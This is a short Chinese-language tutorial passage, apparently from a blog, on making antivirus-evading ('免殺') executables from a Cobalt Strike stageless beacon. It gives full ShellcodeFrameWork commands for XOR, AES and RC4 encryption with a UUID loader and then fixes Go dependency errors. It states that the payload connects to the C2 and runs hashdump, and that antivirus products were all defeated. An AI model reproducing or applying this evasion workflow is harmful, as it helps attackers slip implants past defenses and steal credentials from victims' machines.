這里不詳細講解,可以參考CSDN詳細教程
生成一個免殺效果更好的Stageless類型Raw
注意:擔心Raw格式以及x64附加的payload
將項目與有效負載放置Go環境下
使用異或加密
ShellcodeFrameWork_windows_amd64.exe -shellcodepath x64_beacon.bin -o xor.exe -key cookie -encrypt xor -loadermethod uuid
使用aes加密
ShellcodeFrameWork_windows_amd64.exe -shellcodepath x64_beacon.bin -o aes.exe -key cookie -encrypt aes -loadermethod uuid -salt eikooc
使用rc4加密
ShellcodeFrameWork_windows_amd64.exe -shellcodepath x64_beacon.bin -o rc4.exe -key cookie -encrypt rc4 -loadermethod uuid
饑餓上線c2并執行hashdump命令
全軍覆沒
全軍覆沒
ERROR:exec: 'bin/go': file does not exist
RESULT: []
STDERR:
以上錯誤需要將生成器放置Go語言安裝目錄下執行
ERROR:exit status 1
RESULT: []
STDERR: UUID_agent.go:25:2: cannot find package 'golang.org/x/crypto/argon2' in
any of:
C:\Program Files (x86)\Go\src\golang.org\x\crypto\argon2 (from $GOROOT)
C:\Users\Administrator\go\src\golang.org\x\crypto\argon2 (from $GOPATH)
UUID_agent.go:30:2: cannot find package 'golang.org/x/sys/windows' in any of:
C:\Program Files (x86)\Go\src\golang.org\x\sys\windows (from $GOROOT)
C:\Users\Administrator\go\src\golang.org\x\sys\windows (from $GOPATH)
以上錯誤信息需要安裝Go拓展
在Go/src目錄下新建一個github.com/google目錄
git clone https://github.com/google/uuid.git
會在google目錄下存在一個uuid目錄
然后還需要在Go/src目錄下新建golang.org/x目錄,依此安裝以下拓展
git clone https://github.com/golang/crypto.git
git clone https://github.com/golang/sys.git